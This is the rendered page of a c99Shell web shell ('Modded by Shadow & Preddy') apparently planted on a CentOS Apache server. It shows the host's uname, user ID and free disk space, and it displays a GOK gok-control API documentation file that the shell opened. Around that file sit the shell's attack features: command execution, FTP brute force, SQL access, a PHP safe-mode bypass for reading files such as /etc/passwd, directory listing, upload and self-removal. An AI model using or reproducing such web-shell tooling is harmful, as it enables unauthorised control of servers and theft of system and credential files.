!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/gok/   drwxr-xr-x
Free 50.96 GB of 127.8 GB (39.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     gok-gok-control.html (10.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
gok-control

gok-control

gok-control —

Synopsis




enum        ControlTypes;
enum        ControlFillwiths;
enum        ControlHandlers;
GokControl* gok_control_new                 (void);
void        gok_control_delete_all          (GokControl *pControl);
gint        gok_control_get_control_type    (gchar *NameControlType);
gint        gok_control_get_handler_type    (gchar *NameControlType);
void        gok_control_button_handler      (GtkButton *button,
                                             gpointer user_data);
void        gok_control_add_handler         (GtkWidget *pWidget,
                                             gint HandlerType);
void        gok_control_button_callback_open
                                            (void);
void        gok_control_button_callback_close
                                            (void);

Description

Details

enum ControlTypes

typedef enum {
CONTROL_TYPE_LABEL,
CONTROL_TYPE_HBOX,
CONTROL_TYPE_VBOX,
CONTROL_TYPE_COMBOBOX,
CONTROL_TYPE_SEPERATOR,
CONTROL_TYPE_FRAME,
CONTROL_TYPE_BUTTON,
CONTROL_TYPE_CHECKBUTTON,
CONTROL_TYPE_RADIOBUTTON,
CONTROL_TYPE_SPINBUTTON,
MAX_CONTROL_TYPES /* keep this as the last entry in the enum */
} ControlTypes;


enum ControlFillwiths

typedef enum {
CONTROL_FILLWITH_ACTIONS,
CONTROL_FILLWITH_FEEDBACKS,
CONTROL_FILLWITH_SOUNDS,
CONTROL_FILLWITH_OPTIONS
} ControlFillwiths;


enum ControlHandlers

typedef enum {
CONTROL_HANDLER_BROWSESOUND,
CONTROL_HANDLER_ADVANCED,
MAX_CONTROL_HANDLERS /* keep this as the last entry in the enum */
} ControlHandlers;


gok_control_new ()

GokControl* gok_control_new                 (void);

Creates a new gok_control. It's the caller's responsibility to delete this.

Returns : A pointer to the new control.

gok_control_delete_all ()

void        gok_control_delete_all          (GokControl *pControl);

Deletes the given control and all other controls linked to it.

pControl : Pointer to the control that will be deleted.

gok_control_get_control_type ()

gint        gok_control_get_control_type    (gchar *NameControlType);

NameControlType : Name of the control type.
Returns : The ID number of the control type name. Returns -1 if the control type name can't be found.

gok_control_get_handler_type ()

gint        gok_control_get_handler_type    (gchar *NameControlType);

NameControlType : Name of the control handler.
Returns : The ID number of the control handler name. Returns -1 if the control handler name can't be found.

gok_control_button_handler ()

void        gok_control_button_handler      (GtkButton *button,
                                             gpointer user_data);

pButton: Pointer to the button that was just pressed. user_data: User data that is associated with the button.

button :
user_data :

gok_control_add_handler ()

void        gok_control_add_handler         (GtkWidget *pWidget,
                                             gint HandlerType);

pWidget: Pointer to the button gets added to the handler list. HandlerType: Type of handler the button requires.

pWidget :
HandlerType :

gok_control_button_callback_open ()

void        gok_control_button_callback_open
                                            (void);

Initializes the GOK control callback handlers. This must be called at the beginning of the program.


gok_control_button_callback_close ()

void        gok_control_button_callback_close
                                            (void);

Frees any memory used by the control callbacks. This must be called at the end of the program.


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0126 ]--